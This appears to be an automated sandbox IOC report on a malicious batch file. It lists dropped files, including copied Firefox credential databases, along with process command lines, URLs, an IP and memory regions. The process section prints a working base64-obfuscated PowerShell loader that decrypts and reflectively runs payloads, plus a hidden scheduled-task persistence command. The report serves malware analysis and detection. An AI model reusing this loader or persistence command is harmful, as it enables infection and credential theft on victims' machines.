IOC Report
1.bat

loading gif

Files

File Path
Type
Category
Malicious
1.bat
ASCII text, with very long lines (65187), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\Costura\492059BB4ED4FD9BB5CC046DCF3C0FA2\64\sqlite.interop.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\strt.cmd
ASCII text, with very long lines (65187), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\Bsizous.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\Cakcuofd.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\Eiynan.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\Fzqwfltzgl.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
dropped
C:\Users\user\AppData\Local\Temp\Gaprkc.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\Geuchzibce.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\Jwukkmt.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
dropped
C:\Users\user\AppData\Local\Temp\Koxxepebyr.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\Nbpzr.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\Nsruehpvci.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Temp\Ofjjkweg.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\Reohbzdkbr\v6zchhhv.default-release\cert9.db
SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\Reohbzdkbr\v6zchhhv.default-release\key4.db
SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Temp\Uhcsrgmszip.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\Wgqefurau.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\Xjxdneo.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1m5cahy3.j3f.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cgvjsnr.nip.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ieukqyq.n4i.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ck0uu4c.0qh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5f5c0xao.b1h.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3l0thax.ts5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ary5eerm.kl1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqxonrgg.vq4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fyohms1h.4lg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g2amqgn1.z25.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0tcw4zq.n0h.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j1y2k5p5.rix.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2t3qxb3.ywa.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jh5pvpuq.5xb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kw1qska5.20k.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lk10gypr.yro.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pukzw0g0.dio.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4gkcsjc.0yl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qc5mpafw.rzd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rv0mjcni.0xg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjixl42v.oqi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tdrjgsjd.mqo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_usudjiyt.yov.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycm5sxk4.1tu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
data
dropped
\Device\ConDrv
ASCII text, with very long lines (1840), with CRLF line terminators
dropped
There are 39 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.bat" "
malicious
C:\Windows\System32\cmd.exe
cmd /c \"set __=^&rem\
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\1.bat"
malicious
C:\Windows\System32\cmd.exe
cmd /c \"set __=^&rem\
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\1.bat';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gTURic0IoJFNlcVdSKXskd0hHV2E9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JHdIR1dhLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskd0hHV2EuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyR3SEdXYS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnck00OStQTWJuUlQyRjJpZi9qTERmTGZpeW5XVC84bXQ5UlYvWE9GN1ZnRT0nKTskd0hHV2EuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnU29yNlJDQ3l0RG4xc2FtU0RaQWNVdz09Jyk7JFRZQ3VNPSR3SEdXYS5DcmVhdGVEZWNyeXB0b3IoKTskS3l4VGU9JFRZQ3VNLlRyYW5zZm9ybUZpbmFsQmxvY2soJFNlcVdSLDAsJFNlcVdSLkxlbmd0aCk7JFRZQ3VNLkRpc3Bvc2UoKTskd0hHV2EuRGlzcG9zZSgpOyRLeXhUZTt9ZnVuY3Rpb24gZ3J4eUIoJFNlcVdSKXskTnJjTFE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkU2VxV1IpOyRIVER1Uz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JFBaRkJzPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJE5yY0xRLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskUFpGQnMuQ29weVRvKCRIVER1Uyk7JFBaRkJzLkRpc3Bvc2UoKTskTnJjTFEuRGlzcG9zZSgpOyRIVER1Uy5EaXNwb3NlKCk7JEhURHVTLlRvQXJyYXkoKTt9JElnR3V4PVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskR2VMcUc9Z3J4eUIgKE1EYnNCIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJElnR3V4LCA1KS5TdWJzdHJpbmcoMikpKSk7JGJZbm1XPWdyeHlCIChNRGJzQiAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRJZ0d1eCwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kYllubVcpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJEdlTHFHKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\1')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 43918' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
malicious
C:\Windows\System32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\strt.cmd"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\strt.cmd"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\strt.cmd"
malicious
C:\Windows\System32\cmd.exe
cmd /c \"set __=^&rem\
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\strt.cmd';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gTURic0IoJFNlcVdSKXskd0hHV2E9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JHdIR1dhLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskd0hHV2EuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyR3SEdXYS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnck00OStQTWJuUlQyRjJpZi9qTERmTGZpeW5XVC84bXQ5UlYvWE9GN1ZnRT0nKTskd0hHV2EuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnU29yNlJDQ3l0RG4xc2FtU0RaQWNVdz09Jyk7JFRZQ3VNPSR3SEdXYS5DcmVhdGVEZWNyeXB0b3IoKTskS3l4VGU9JFRZQ3VNLlRyYW5zZm9ybUZpbmFsQmxvY2soJFNlcVdSLDAsJFNlcVdSLkxlbmd0aCk7JFRZQ3VNLkRpc3Bvc2UoKTskd0hHV2EuRGlzcG9zZSgpOyRLeXhUZTt9ZnVuY3Rpb24gZ3J4eUIoJFNlcVdSKXskTnJjTFE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkU2VxV1IpOyRIVER1Uz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JFBaRkJzPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJE5yY0xRLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskUFpGQnMuQ29weVRvKCRIVER1Uyk7JFBaRkJzLkRpc3Bvc2UoKTskTnJjTFEuRGlzcG9zZSgpOyRIVER1Uy5EaXNwb3NlKCk7JEhURHVTLlRvQXJyYXkoKTt9JElnR3V4PVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskR2VMcUc9Z3J4eUIgKE1EYnNCIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJElnR3V4LCA1KS5TdWJzdHJpbmcoMikpKSk7JGJZbm1XPWdyeHlCIChNRGJzQiAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRJZ0d1eCwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kYllubVcpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJEdlTHFHKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\strt')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 43918' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 17 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://duckduckgo.com/chrome_newtab
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://www.microsoft.1
unknown
https://duckduckgo.com/ac/?q=
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://crl.microsQ
unknown
https://go.micro
unknown
http://www.micom/pkiops/Docs/ry.htm0
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://aka.ms/winsvr-2022-pshelpX
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://ocsp.rootca1.amazontrust.com0:
unknown
https://www.sqlite.org/copyright.html2
unknown
http://wicroft.com
unknown
https://www.ecosia.org/newtab/
unknown
https://github.com/Pester/Pester
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
http://x1.c.lencr.org/0
unknown
http://x1.i.lencr.org/0
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?
unknown
https://oneget.orgX
unknown
http://crl.microsoftS
unknown
http://www.microsoft.b
unknown
https://aka.ms/pscore68
unknown
http://www.microsoft.c
unknown
https://system.data.sqlite.org/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://oneget.org
unknown
There are 32 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
108.190.12.0.in-addr.arpa
unknown

IPs

IP
Domain
Country
Malicious
95.164.10.214
unknown
Gibraltar

Memdumps

Base Address
Regiontype
Protect
Malicious
1C31943B000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
7FF848FAA000
trusted library allocation
page read and write
6C71C73000
stack
page read and write
7FF84918C000
trusted library allocation
page read and write
7FF849112000
trusted library allocation
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
2B022767000
heap
page read and write
1D90110E000
trusted library allocation
page read and write
201456DF000
trusted library allocation
page read and write
72CACFE000
stack
page read and write
7FF849043000
trusted library allocation
page read and write
1D901691000
trusted library allocation
page read and write
205CFBE0000
heap
page execute and read and write
7FF849100000
trusted library allocation
page read and write
1D974B4A000
heap
page read and write
7DF4097D0000
trusted library allocation
page execute and read and write
1C30779C000
heap
page read and write
CE12D8B000
stack
page read and write
2014566A000
trusted library allocation
page read and write
2B03AE16000
heap
page read and write
7FF8490C0000
trusted library allocation
page read and write
7FF8492B0000
trusted library allocation
page read and write
7FF8490D0000
trusted library allocation
page read and write
201456AE000
trusted library allocation
page read and write
7FF849149000
trusted library allocation
page read and write
7FF849178000
trusted library allocation
page read and write
197B9BE000
stack
page read and write
19DA2CE000
stack
page read and write
2015C5EC000
heap
page read and write
205B5C50000
trusted library allocation
page read and write
1C307756000
heap
page read and write
E06657A000
stack
page read and write
1D97525F000
heap
page read and write
7FF848E2B000
trusted library allocation
page read and write
1D900E07000
trusted library allocation
page read and write
2B032C45000
trusted library allocation
page read and write
2069D000000
heap
page read and write
7FF849178000
trusted library allocation
page read and write
1C321C02000
heap
page read and write
7FF848EC6000
trusted library allocation
page execute and read and write
1C321B52000
heap
page read and write
1C3217F0000
heap
page read and write
E066677000
stack
page read and write
205B7A4E000
trusted library allocation
page read and write
19D96FE000
stack
page read and write
7FF849160000
trusted library allocation
page read and write
2014511D000
trusted library allocation
page read and write
1784FEB0000
heap
page read and write
1D972CC0000
heap
page read and write
1D972AFA000
heap
page read and write
1D975313000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
201459F3000
trusted library allocation
page read and write
205B5CA5000
heap
page read and write
205B5920000
heap
page read and write
7FF848FB2000
trusted library allocation
page read and write
1D901649000
trusted library allocation
page read and write
1D91007F000
trusted library allocation
page read and write
2B0244A6000
trusted library allocation
page read and write
1784FEC1000
trusted library allocation
page read and write
7FF849210000
trusted library allocation
page read and write
2014512E000
trusted library allocation
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
2B03B3F8000
heap
page read and write
1C321A70000
heap
page read and write
201455D9000
trusted library allocation
page read and write
1D972CC7000
heap
page read and write
20143C60000
heap
page read and write
1C3218A0000
heap
page read and write
1D972AF4000
heap
page read and write
2015C9B2000
heap
page read and write
1D900084000
trusted library allocation
page read and write
1C30775E000
heap
page read and write
2015C61C000
heap
page read and write
197B779000
stack
page read and write
7FF848E13000
trusted library allocation
page execute and read and write
7FF849050000
trusted library allocation
page read and write
205B91D2000
trusted library allocation
page read and write
20143C65000
heap
page read and write
7FF849270000
trusted library allocation
page read and write
197BA36000
stack
page read and write
7FF849090000
trusted library allocation
page read and write
7FF849240000
trusted library allocation
page execute and read and write
1785FED0000
trusted library allocation
page read and write
1784DFBF000
heap
page read and write
1D974D78000
heap
page read and write
7FF849180000
trusted library allocation
page read and write
7FF848F90000
trusted library allocation
page read and write
7DF48D820000
trusted library allocation
page execute and read and write
7FF849203000
trusted library allocation
page read and write
7FF8491C0000
trusted library allocation
page read and write
2B020E90000
trusted library section
page read and write
20142180000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
7FF848ECC000
trusted library allocation
page execute and read and write
7FF849180000
trusted library allocation
page read and write
2B032C39000
trusted library allocation
page read and write
2069D00F000
heap
page read and write
7FF84917C000
trusted library allocation
page read and write
7FF848E14000
trusted library allocation
page read and write
6C72DCF000
stack
page read and write
1784FD90000
heap
page execute and read and write
7FF849190000
trusted library allocation
page read and write
7FF848E0B000
trusted library allocation
page execute and read and write
7FF849090000
trusted library allocation
page read and write
1D974520000
heap
page execute and read and write
20143C74000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
1C3193A1000
trusted library allocation
page read and write
2015C98C000
heap
page read and write
20154114000
trusted library allocation
page read and write
205B59B6000
heap
page read and write
7FF849175000
trusted library allocation
page read and write
1784FFD3000
trusted library allocation
page read and write
1D974BF0000
heap
page read and write
205C7B89000
trusted library allocation
page read and write
7FF849100000
trusted library allocation
page read and write
7FF848E4C000
trusted library allocation
page execute and read and write
7FF849172000
trusted library allocation
page read and write
2B03AE5E000
heap
page read and write
1D901798000
trusted library allocation
page read and write
2015C6A5000
heap
page read and write
20144FDB000
trusted library allocation
page read and write
1C321BFA000
heap
page read and write
7FF848FC1000
trusted library allocation
page read and write
7FF849170000
trusted library allocation
page read and write
2015CA12000
heap
page read and write
201455A7000
trusted library allocation
page read and write
1D900FAD000
trusted library allocation
page read and write
7FF848FB2000
trusted library allocation
page read and write
7FF849100000
trusted library allocation
page read and write
205C78A0000
trusted library allocation
page read and write
7FF849050000
trusted library allocation
page read and write
201421B0000
heap
page read and write
1784E130000
heap
page read and write
2B023ADA000
trusted library allocation
page read and write
2B020EE5000
heap
page read and write
1C309390000
heap
page execute and read and write
2015C3C5000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
72CA87E000
stack
page read and write
72CA3DF000
stack
page read and write
2B03B0A4000
heap
page read and write
1D901ADC000
trusted library allocation
page read and write
1C321EB8000
heap
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
205B59AE000
heap
page read and write
19D927F000
stack
page read and write
7FF849190000
trusted library allocation
page read and write
1C3076E0000
heap
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
1C3092B0000
trusted library allocation
page read and write
1D901628000
trusted library allocation
page read and write
1C307758000
heap
page read and write
1D972B3D000
heap
page read and write
205C7891000
trusted library allocation
page read and write
7FF849010000
trusted library allocation
page read and write
20145121000
trusted library allocation
page read and write
20143F20000
heap
page execute and read and write
205B59A8000
heap
page read and write
1D974605000
heap
page read and write
2B020EC0000
trusted library allocation
page read and write
205CFA16000
heap
page execute and read and write
7FF848E1D000
trusted library allocation
page execute and read and write
7FF848FA0000
trusted library allocation
page execute and read and write
2B023737000
trusted library allocation
page read and write
7FF8490B0000
trusted library allocation
page read and write
1C307980000
heap
page readonly
7FF849090000
trusted library allocation
page read and write
7FF849170000
trusted library allocation
page read and write
2B020CFD000
heap
page read and write
17868040000
heap
page execute and read and write
1D9729D0000
heap
page read and write
7FF8491A0000
trusted library allocation
page read and write
19D98FB000
stack
page read and write
1C321BE0000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
2015C9E5000
heap
page read and write
7FF848FC1000
trusted library allocation
page read and write
7FF848EC0000
trusted library allocation
page read and write
205CFCB7000
heap
page read and write
1C321BD7000
heap
page read and write
1D91019A000
trusted library allocation
page read and write
178680A3000
heap
page read and write
7FF84904B000
trusted library allocation
page read and write
1784E140000
trusted library allocation
page read and write
72CA7FD000
stack
page read and write
7FF849140000
trusted library allocation
page read and write
7FF849250000
trusted library allocation
page read and write
1D974BE1000
heap
page read and write
2015C980000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
7FF848E6C000
trusted library allocation
page execute and read and write
7FF848E2B000
trusted library allocation
page read and write
1D972A50000
trusted library allocation
page read and write
7FF849000000
trusted library allocation
page execute and read and write
1C30A9FE000
trusted library allocation
page read and write
20145934000
trusted library allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
1C3078E0000
heap
page read and write
1785FF2F000
trusted library allocation
page read and write
7FF84915C000
trusted library allocation
page read and write
1D972BD6000
heap
page read and write
7FF848FC1000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
1D974CCB000
heap
page read and write
2015CA16000
heap
page read and write
7FF8490E0000
trusted library allocation
page read and write
7FF848E0B000
trusted library allocation
page read and write
2B03B04E000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
6C71E7A000
stack
page read and write
201540A3000
trusted library allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
7FF849080000
trusted library allocation
page read and write
7FF849160000
trusted library allocation
page read and write
F3E41FE000
stack
page read and write
1784FEF6000
trusted library allocation
page read and write
7FF849172000
trusted library allocation
page read and write
7FF849160000
trusted library allocation
page read and write
F3E40FF000
unkown
page read and write
7FF848EC6000
trusted library allocation
page read and write
1D972AB5000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
2069CE20000
heap
page read and write
1D974C28000
heap
page read and write
20143FB4000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page execute and read and write
1D974A88000
heap
page read and write
2069CFE0000
heap
page read and write
1C3091A6000
heap
page read and write
2B03B09C000
heap
page read and write
CE11E7E000
stack
page read and write
E06647A000
stack
page read and write
7FF848F9A000
trusted library allocation
page read and write
1784FFD0000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
205CFA10000
heap
page execute and read and write
CE11C7E000
stack
page read and write
7FF849158000
trusted library allocation
page read and write
2B03AE56000
heap
page read and write
1D974C5E000
heap
page read and write
2015C3EC000
heap
page read and write
1784E090000
heap
page read and write
197C80A000
stack
page read and write
1786833B000
heap
page read and write
20145125000
trusted library allocation
page read and write
7FF8490A0000
trusted library allocation
page read and write
2B020C35000
heap
page read and write
1D97514A000
heap
page read and write
20145590000
trusted library allocation
page read and write
2B03B129000
heap
page read and write
6C71FFD000
